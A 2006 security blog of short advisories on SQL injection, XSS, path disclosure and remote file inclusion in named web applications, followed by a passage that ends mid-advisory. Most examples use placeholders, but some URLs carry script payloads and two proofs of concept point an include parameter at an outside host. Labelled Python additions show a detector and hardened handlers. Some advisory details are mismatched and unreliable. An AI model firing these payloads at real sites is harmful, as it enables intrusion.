by r0t, der4444, cembo, VietMafia

Sunday, April 30, 2006

Barracuda vuln.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:www.boonex.com/products/barracuda/
affected versions:1.1 and prior
###############################################


Vuln. Description:

Barracuda contains a flaw that allows remote SQL injection attacks. Input passed to the "link_dir_target" and "link_id_target" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/index.php?sid=[user_hash]&location=link_edit&link_dir_target=[SQL]

/index.php?sid=[user_hash]&location=link_edit&link_dir_target=1&link_id_target=[SQL]




+ Bonus:

/index.php?location=[localfile]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

MaxTrade sql inj.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendorlink:http://avalonbg.com/en_soft.html
affected versions:1.0.1 and prior
###############################################

Vuln. Description:

MaxTrade contains a flaw that allows remote SQL injection attacks. Input passed to the "categori" and "stranica" parameters in "pocategories.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/pocategories.php?stranica=categories&categori=[SQL]
/pocategories.php?stranica=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

RT: Request Tracker vuln.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:www.bestpractical.com/?rt=3.5.HEAD
affected versions:RT 3.5.HEAD
###############################################

Vuln. Description:

RT contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker submits a crafted value in the "Rows" parameter of "/Dist/Display.html", which discloses the software's installation path, resulting in a loss of confidentiality. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.


example:

/Dist/Display.html?Status=Active&Name=google&Rows=[CODE]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

GoogleStore XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:http://google.com/
affected versions:last/actual
###############################################

Vuln. Description:

GoogleStore contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "code" parameter in "/popups/view.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

http://www.googlestore.com/CA/popups/view.asp?code=%22%3Cscript%3Ealert('r0t')%3C/script%3E



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Status:
Reported through the cpan.org tracker
http://rt.cpan.org/Public/Bug/Display.html?id=18990
###############################################
More information @ unsecured-systems.com/forum/

OrbitHYIP XSS

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:www.orbitscripts.com/orbithyip_overview.html
affected versions:2.0 and prior
###############################################

Vuln. Description:

OrbitHYIP contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "referral" parameter in "signup.php" and to the "id" parameter in "members.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/signup.php?referral=[XSS]
/members.php?login=r0t&p=pwd&func=useinvestplan&id=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Pinnacle Cart XSS

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendorlink:http://www.pinnaclecart.com/
affected versions:3.33 and prior
###############################################

Vuln. Description:

Pinnacle Cart contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "setbackurl" parameter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/index.php?p=&address_id=&setbackurl=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CPS <=3.4.0 XSS

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendorlink:http://www.cps-project.org/
affected versions:3.4.0 and prior
###############################################


Vuln. Description:

CPS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "pos" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/popup_image?pos=[XSS]

The resulting error message also discloses the full installation path and other information.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, April 28, 2006

Kmail <=2.3 vuln.

###############################################
Vulnerability discovered by : r0t
Date: 28 april 2006
vendorlink:www.webofall.com/displaynews.php?id=4
affected versions:2.3 and prior
###############################################


Vuln. Description:


1. Multiple Cross-Site Scripting attack vulnerabilities.

Kmail contains flaws that allow remote cross-site scripting attacks. These flaws exist because input passed to the "id" parameter in "main.php", the "ordner" parameter in "main.php" and "webdisk.php", the "draft" parameter in "compose.php", and the "m" and "y" parameters in "calendar.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/main.php?action=showmail&id=[XSS]&bmsession=b77f6a49569a0e6e2d35a8c14cd3ace2

/main.php?ordner=[XSS]&bmsession=1f2a3aeb01fd5253be322a704e53469f

/compose.php?bmsession=1f2a3aeb01fd5253be322a704e53469f&draft=[XSS]

/webdisk.php?bmsession=1f2a3aeb01fd5253be322a704e53469f&ordner=[XSS]

/calendar.php?action=viewMonth&m=[XSS]&y=2006&bmsession=1f2a3aeb01fd5253be322a704e53469f

/calendar.php?action=viewMonth&m=5&y=[XSS]&bmsession=1f2a3aeb01fd5253be322a704e53469f



2. Full Path Disclosure.

example:

/calendar.php?d=[CODE]&m=&y=&bmsession=5825d89388de35f8f65ec106c6e3537b


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, April 27, 2006

Open WebMail <=2.51 XSS vuln.

###############################################
Vulnerability discovered by : r0t
Date: 27 april 2006
vendorlink:http://openwebmail.org/
affected versions:2.51 and prior
###############################################


Vuln. Description:


Open WebMail contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "sessionid" parameter in "openwebmail-send.pl", "openwebmail-advsearch.pl", "openwebmail-folder.pl", "openwebmail-prefs.pl", "openwebmail-abook.pl", "openwebmail-main.pl", "openwebmail-read.pl", "openwebmail-cal.pl" and "openwebmail-webdisk.pl" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/openwebmail-send.pl?sessionid=[XSS]
/openwebmail-advsearch.pl?sessionid=[XSS]
/openwebmail-folder.pl?action=editfolders&sessionid=[XSS]
/openwebmail-prefs.pl?action=editprefs&sessionid=[XSS]
/openwebmail-abook.pl?sessionid=[XSS]
/openwebmail-main.pl?sessionid=[XSS]
/openwebmail-read.pl?sessionid=[XSS]
/openwebmail-cal.pl?sessionid=[XSS]
/openwebmail-webdisk.pl?action=showdir&sessionid=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, April 25, 2006

QuickEStore 7.9 vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 april 2006
vendorlink:www.quickestore.com
affected versions:7.9 and previous
###############################################


Vuln. Description:


1. SQL Injection vuln.

QuickEStore contains a flaw that allows remote SQL injection attacks. Input passed to the "OrderID" parameter in "shipping.cfm" and "checkout.cfm", the "ItemID" parameter in "proddetail.cfm", the "SubCatID" parameter in "index.cfm", the "CategoryID" parameter in "prodpage.cfm" and the "ProdID" parameter in "Details.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]
/index.cfm?CFID=1&CFTOKEN=1&SubCatID=[SQL]
/proddetail.cfm?CFID=1&CFTOKEN=1&ItemID=[SQL]
/checkout.cfm?CFID=&CFTOKEN=&OrderID=[SQL]
/shipping.cfm?CFID=&CFTOKEN=&OrderID=[SQL]



2. Full Path Disclosure.

It is possible to disclose the full path to the installation by supplying an invalid value for any of the parameters affected by the SQL injection issue (see 1. above).

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Cartweaver ColdFusion vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 april 2006
vendorlink:www.cartweaver.com
affected versions:2.16.11 and previous
###############################################


Vuln. Description:


1. SQL Injection vuln.

Cartweaver ColdFusion contains a flaw that allows remote SQL injection attacks. Input passed to the "category" and "keywords" parameters in "Results.cfm" and to the "ProdID" parameter in "Details.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/Results.cfm?category=[SQL]
/Results.cfm?keywords=[SQL]
/Details.cfm?ProdID=[SQL]




2. Full Path Disclosure.

It is possible to disclose the full path to the installation by supplying an invalid value for the "secondary", "PageNum_Results", "category" or "keywords" parameter in "Results.cfm", or for the "ProdID" parameter in "Details.cfm".

examples:

/Results.cfm?PageNum_Results=&category=&secondary=[CODE]
/Results.cfm?PageNum_Results=[CODE]
/Details.cfm?ProdID=[CODE]
/Results.cfm?category=[CODE]
/Results.cfm?keywords=[CODE]
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ampleShop™ eCommerce Software vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 april 2006
vendor:www.amplecom.com/
affected versions:2.1 and previous
###############################################


Vuln. Description:

ampleShop™ contains a flaw that allows remote SQL injection attacks. Input passed to the "RecordID" parameter in "Customeraddresses_RecordAction.cfm" and "youraccount.cfm", to the "solus" parameter in "detail.cfm", and to the "cat" parameter in "category.cfm" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/Customeraddresses_RecordAction.cfm?RecordID=1[SQL]&CustomerID=6&set=yes

/youraccount.cfm?RecordID=[SQL]

/category.cfm?cat=[SQL]

/detail.cfm?solus=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 22, 2006

logMethods XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 22 april 2006
vendorlink:http://logmethods.com/
affected versions:0.9 and prior
###############################################


Vuln. Description:

logMethods contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "kwd" parameter in "/lms/a2z.jsp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, April 21, 2006

phpLDAPadmin multiple vuln.

phpLDAPadmin vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 april 2006
vendorlink:http://phpldapadmin.sourceforge.net/
affected versions:phpLDAPadmin 0.9.8 and prior
###############################################

Vuln. Description:

phpLDAPadmin contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "dn" parameter in "compare_form.php", "copy_form.php", "rename_form.php", "template_engine.php" and "delete_form.php" isn't properly sanitised before being returned to the user.
Input passed to the "scope" parameter in "search.php" isn't properly sanitised before being returned to the user either.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/delete_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert('r0t')%3C/script%3E


There is also a script insertion (HTML injection) vulnerability:

For example, open "/template_engine.php" and enter the following input:
Container DN : [XSS]
Machine Name: [XSS]
UID Number: [XSS]
These fields aren't sanitised before being stored by the vulnerable system. This can be exploited to execute arbitrary script code in a user's browser session in the context of an affected website when a malicious entry is viewed.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
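Added example, not part of the phpLDAPadmin advisory or of phpLDAPadmin itself: a small Python detector run over constructed Apache-style access-log lines. It percent-decodes each query parameter (repeatedly, so a double-encoded value is seen the way the application would see it) and flags the script-tag and SQL-metacharacter shapes that the examples on this page use. The log lines, client IPs and paths are constructed for the example; the detection patterns are a starting point, not a complete rule set.

```python
"""Flag encoded script tags / SQL metacharacters in access-log query strings (added example)."""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines; 192.0.2.0/24 is documentation address space.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Apr/2006:10:00:01 +0000] "GET /compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.11 - - [21/Apr/2006:10:00:02 +0000] "GET /search.php?server_id=0&scope=%2522%253Cscript%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.12 - - [21/Apr/2006:10:00:03 +0000] "GET /plexum.php?section=webstats&startpos=15%20OR%201%3D1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.13 - - [21/Apr/2006:10:00:04 +0000] "GET /search.php?server_id=0&scope=sub HTTP/1.1" 200 777 "-" "Mozilla/5.0"
"""

# client ip, request target, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
SCRIPT_TAG = re.compile(r"<\s*/?\s*script", re.I)
SQL_MARK = re.compile(r"\b(?:or|and)\b\s+\S+\s*=|--|/\*|\bunion\b\s+\bselect\b", re.I)


def fully_decode(value: str, limit: int = 3) -> str:
    # Decode until the string stops changing (bounded), so %2522 -> %22 -> " is caught.
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text: str) -> list[tuple[str, str, str]]:
    # Returns (client_ip, path, "parameter: reason") for each flagged request line.
    hits: list[tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        parts = urlsplit(target)
        # parse_qs already applies one round of percent-decoding per value.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for raw in values:
                value = fully_decode(raw)
                if SCRIPT_TAG.search(value):
                    hits.append((ip, parts.path, f"{name}: script tag"))
                elif SQL_MARK.search(value):
                    hits.append((ip, parts.path, f"{name}: sql metacharacters"))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

The second sample line is the reason for the decode loop: a single `unquote` turns `%2522%253C` into `%22%3C`, which matches nothing, while the application that decodes again sees `"<`.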

Thursday, April 20, 2006

phpMyAdmin XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendorlink:http://www.phpmyadmin.net/
affected versions:
phpMyAdmin 2.8.0.3
phpMyAdmin 2.8.0.2
phpMyAdmin 2.8.1-dev (CVS version)
phpMyAdmin 2.9.0-dev (CVS version)
and prior versions also can be affected
###############################################


Vuln. Description:

phpMyAdmin contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "lang" parameter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

http://[victim]/phpMyAdmin/index.php?lang=[XSS]

note:
The attacker doesn't need to be logged in to the vulnerable system to exploit this issue.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

AWStats 6.5.x multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendorlink:http://awstats.sourceforge.net/
affected versions: 6.5 (build 1.857) and prior
###############################################


Vuln. Description:

1. Cross-Site Scripting

AWStats contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "refererpagesfilter", "refererpagesfilterex", "urlfilterex", "urlfilter", "hostfilter" and "hostfilterex" parameters in "awstats.pl" isn't properly sanitised before being returned to the user. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/awstats.pl?refererpagesfilter=[XSS]&refererpagesfilterex=&output=refererpages&config=unsecured-systems.com&year=2006&month=all

/awstats.pl?refererpagesfilter=&refererpagesfilterex=[XSS]&output=refererpages&config=unsecured-systems.com&year=2006&month=all

/awstats.pl?urlfilter=&urlfilterex=[XSS]&output=urlentry&config=unsecured-systems.com&year=2006&month=all

/awstats.pl?urlfilter=[XSS]&urlfilterex=&output=urlentry&config=unsecured-systems.com&year=2006&month=all

/awstats.pl?hostfilter=[XSS]&hostfilterex=&output=allhosts&config=unsecured-systems.com&year=2006&month=all

/awstats.pl?hostfilter=&hostfilterex=[XSS]&output=allhosts&config=unsecured-systems.com&year=2006&month=all



2. Full Path Disclosure.

examples:

/awstats.pl?month=&year=[CODE]
/awstats.pl?pluginmode=[CODE]
/awstats.pl?month=[CODE]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
It's just today's update.. :)
###############################################
More information @ unsecured-systems.com/forum/
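Added example, not code from AWStats, Kmail, QuickEStore or Cartweaver, for the Full Path Disclosure sections on this page: a request handler that echoes the server-side exception to the client (which is how the absolute installation path ends up in the response) beside one that validates the parameter, keeps the detail in a server-side log and answers with a generic message. The "month" parameter, the in-memory SERVER_LOG list and the (status, body) return shape are assumptions of this example.

```python
"""Verbose error output beside a generic error with server-side logging (added example)."""
from __future__ import annotations

import traceback

# Constructed in-memory stand-in for the web server's error log.
SERVER_LOG: list[str] = []


def month_report_unsafe(month: str) -> tuple[int, str]:
    # The flaw: a non-numeric "month" raises, and the traceback (which names this
    # file by absolute path) is written into the HTTP response body.
    try:
        return 200, f"report for month {int(month):02d}"
    except Exception:
        return 500, "<pre>" + traceback.format_exc() + "</pre>"


def month_report_safe(month: str) -> tuple[int, str]:
    # Hardened: validate before use, log the detail server-side, reply generically.
    if not month.isdigit() or not 1 <= int(month) <= 12:
        SERVER_LOG.append(f"rejected month={month!r} from client")
        return 400, "Invalid month parameter."
    try:
        return 200, f"report for month {int(month):02d}"
    except Exception:
        # Anything unexpected is still recorded with full detail, but only here.
        SERVER_LOG.append(traceback.format_exc())
        return 500, "Internal error."


if __name__ == "__main__":
    print(month_report_unsafe("x")[1])   # traceback with the absolute path of this file
    print(month_report_safe("x"))        # (400, 'Invalid month parameter.')
    print(SERVER_LOG[-1])                # the detail stayed on the server
```

For the PHP and ColdFusion applications above the same split is a configuration matter as much as a code one: in PHP, `display_errors=Off` with `log_errors=On` keeps the warning (and its file path) out of the response while preserving it in the server log.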

W2B Online Banking vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendorlink:www.w2b.ru/OnlineBanking/index.php
affected versions:last/actual
###############################################

Vuln. Description:

W2B Online Banking contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "SID" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Testing the XSS also yields a full path disclosure.


example:


/?ilang=eng&SID=&[XSS]



+

/?ilang=rus&SID=r0t_LOve_Banking_software_like_this_one!

/?ilang=r0t_LOve_Banking_software_like_this_one!

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

I-Rater Platinum - Remote File Inclusion Vuln

=================================
developer's site: www.i-rater.com
script: I-Rater Platinum
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in "include/common.php" (lines 3 and 4), which does not validate the "include_path" variable properly. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.

PoC:

http://[target]/[path]/include/common.php?include_path=http://unsecured-systems.com/forum/

Net Clubs Pro XSS vuln

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendor:www.aasimedia.com/nc/nc.shtml
affected versions:4.0 and prior
###############################################

Vuln. Description:

Net Clubs Pro contains flaws that allow remote cross-site scripting attacks.
These flaws exist because input passed to the "onuser", "pass", "chatsys", "room", "username" and "to" parameters in "/vchat/scripts/sendim.cgi", to the "username" parameter in "/vchat/scripts/imessage.cgi", to the "password" parameter in "login.cgi" and to the "cat_id" parameter in "classifieds/viewcat.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

//cgi-bin/netclubs//vchat/scripts/imessage.cgi?toto=&to=&sentby=&fromuser=r0t&command=changefont&username=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=&to=[XSS]

//cgi-bin/netclubs//login.cgi?username=r0t&password=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
gr33tZ:der4444,VietMafia,cembo!
###############################################
More information @ unsecured-systems.com/forum/

Portal Pack 6 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendor:www.kcscripts.com/scripts/portal-pack.htm
affected versions:6.0 and prior
###############################################


Vuln. Description:


Portal Pack contains flaws that allow remote cross-site scripting attacks.
These flaws exist because input passed to the "sort_order" parameter in "calendar/Visitor.cgi" and "news/NsVisitor.cgi", to the "q" parameter in "search/search.cgi" and to the "cat_id" parameter in "classifieds/viewcat.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/cgi-bin/calendar/Visitor.cgi?job=view_event&eventNo=0&sort_order=[XSS]

/cgi-bin/news/NsVisitor.cgi?job=view_article&articleNo=0&sort_order=[XSS]

/cgi-bin/search/search.cgi?q=[XSS]

/cgi-bin/classifieds/viewcat.cgi?cat_id=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, April 19, 2006

TotalCalendar - Remote code execution bug

====================================
developer's site: www.sweetphp.com
script: TotalCalendar
risk: critical
status: unpatched
discovered by: VietMafia
====================================

Vuln. Description:

This flaw is due to an input validation error in "about.php" (line 7), "auth.php" (line 5) and some other files, which do not validate the "$inc_dir" variable properly. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.
The TotalCalendar module for PhpNuke is vulnerable as well.

example file: about.php

line 7:
...
require_once($inc_dir."config.php");
...

PoC:

http://[target]/[path]/about.php?inc_dir=http://unsecured-systems.com/forum/

=====================================
Greetings to r0t,der444 & cembo - : )
=====================================
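Added example, not I-Rater's or TotalCalendar's code, for the two remote file inclusion advisories above (I-Rater's "include_path" and TotalCalendar's "$inc_dir"): the include directory is a server-side constant, the request may only choose a key from an allow-list, anything that carries a URL scheme or host is rejected outright, and the resolved path is re-checked to stay under the fixed directory. INCLUDE_ROOT, ALLOWED_INCLUDES and the file names are constructed for the example.

```python
"""Allow-list include resolution anchored to a fixed directory (added example)."""
from __future__ import annotations

import os
from urllib.parse import urlsplit

# Constructed layout; the real applications' directory structure is not known here.
INCLUDE_ROOT = "/srv/example-app/include"
ALLOWED_INCLUDES = {"config": "config.php", "auth": "auth.php"}


def is_remote_reference(value: str) -> bool:
    # http://host/..., ftp://..., or scheme-relative //host/... all name a remote
    # resource; passing one to an include is exactly the flaw in both advisories.
    parts = urlsplit(value)
    return bool(parts.scheme) or bool(parts.netloc)


def resolve_include(name: str, root: str = INCLUDE_ROOT) -> str | None:
    # Hardened pattern: the client supplies a key, never a path. Even after the
    # allow-list lookup the result is normalised and checked against root, so a
    # misconfigured allow-list entry cannot escape the include directory either.
    if is_remote_reference(name) or name not in ALLOWED_INCLUDES:
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, ALLOWED_INCLUDES[name]))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    print(resolve_include("config"))                                  # .../include/config.php
    print(resolve_include("http://unsecured-systems.com/forum/"))     # None
    print(resolve_include("../outside"))                              # None
```

In PHP the first line of defence is that `$inc_dir` must be set by the script itself (not left to register_globals) and that `allow_url_include` stays off; the allow-list above is what to do when the request genuinely has to pick a file.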

Visale XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:http://www.visale.com/
affected versions: 1.0 and previous
###############################################

Vuln. Description:

Visale contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "keyval" parameter in "pbpgst.cgi", to the "catsubno" parameter in "pblscg.cgi" and to the "listno" parameter in "pblsmb.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/pbpgst.cgi?keyval=[XSS]
/pblscg.cgi?catsubno=[XSS]
/pblsmb.cgi?cklv=0&listno=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CommuniMail XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:http://www.sibsoft.net/communimail.html
affected versions: 1.2 and previous
###############################################

Vuln. Description:

IntelliLink Pro contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "list_id" parameter in "mailadmin.cgi" and to the "form_id" parameter in "templates.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/cgi-bin/communimail/mailadmin.cgi?saction=show_contacts&list_id=[XSS]

/cgi-bin/communimail/templates.cgi?saction=edit_form&form_id=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

IntelliLink Pro XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:http://www.smarterscripts.com/intellilink/pro.shtml
affected versions:5.06 and previous
###############################################

Vuln. Description:

IntelliLink Pro contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "url" parameter in "addlink_lwp.cgi" and to the "id", "forgotid" and "forgotpass" parameters in "edit.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:


/addlink_lwp.cgi?url=[XSS]
/edit.cgi?id=[XSS]
/edit.cgi?forgotid=[XSS]
/edit.cgi?forgotpass=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BannerFarm XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:www.perlcoders.com/main/scripts.html?script=BannerFarm
affected versions:2.3 and previous
###############################################


Vuln. Description:

BannerFarm contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "aff" and "cat" parameters in "banners.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/banners.cgi?aff=[XSS]
/banners.cgi?aff=&cat=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Plexum X5 SQL vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendorlink:http://www.plexum.com/network/
affected versions:X5 and previous
###############################################


Vuln. Description:

Plexum contains a flaw that allows remote SQL injection attacks. Input passed to the "pagesize", "maxrec" and "startpos" parameters in "plexum.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/plexum.php?section=webstats&page=hits&startpos=15&maxrec=457&pagesize=[SQL]

/plexum.php?section=webstats&page=hits&startpos=450&maxrec=[SQL]

/plexum.php?section=webstats&page=hits&startpos=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PlexCart X3 SQL Inj

PlexCart X3 SQL Injection Vulnerability

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendorlink:www.plexum.com/ecommerce/shopping_cart/
affected versions:X3 and previous
###############################################

Vuln. Description:

